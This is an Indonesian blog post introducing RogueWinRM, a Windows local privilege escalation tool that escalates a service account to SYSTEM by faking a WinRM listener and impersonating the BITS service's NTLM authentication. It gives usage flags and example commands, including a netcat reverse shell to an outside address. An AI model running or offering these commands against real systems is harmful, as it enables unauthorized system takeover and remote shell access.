Kang IT
RogueWinRM - Eskalasi Hak Istimewa Lokal Windows Dari Akun Layanan Ke Sistem
RogueWinRM adalah eksploitasi eskalasi hak istimewa lokal yang memungkinkan untuk eskalasi dari akun Layanan (dengan SeImpersonatePrivilege) ke akun Sistem Lokal jika layanan WinRM tidak berjalan ( default pada Win10 tetapi TIDAK pada Windows Server 2019 ).
Secara singkat, ia akan mendengarkan koneksi masuk pada port 5985 yang memalsukan layanan WinRM yang sebenarnya.
Ini hanya server web minimal yang akan mencoba menegosiasikan otentikasi NTLM dengan layanan apa pun yang mencoba menyambung di port itu.
Kemudian layanan BITS (berjalan sebagai Sistem Lokal) dipicu dan itu akan mencoba untuk mengotentikasi ke pendengar nakal kami. Setelah diautentikasi ke pendengar nakal kami, kami dapat meniru pengguna Sistem Lokal yang memicu proses sewenang-wenang dengan hak istimewa tersebut.
Anda dapat menemukan deskripsi teknis lengkap tentang kerentanan ini di tautan ini -> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
Pemakaian
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output
Contoh
Menjalankan cmd interaktif:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Menjalankan netcat reverse shell:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"
Penulis
- Antonio Cocomazzi
- Andrea Pierini
- Roberto (0xea31)
Regatds
Kang IT
No comments:
Post a Comment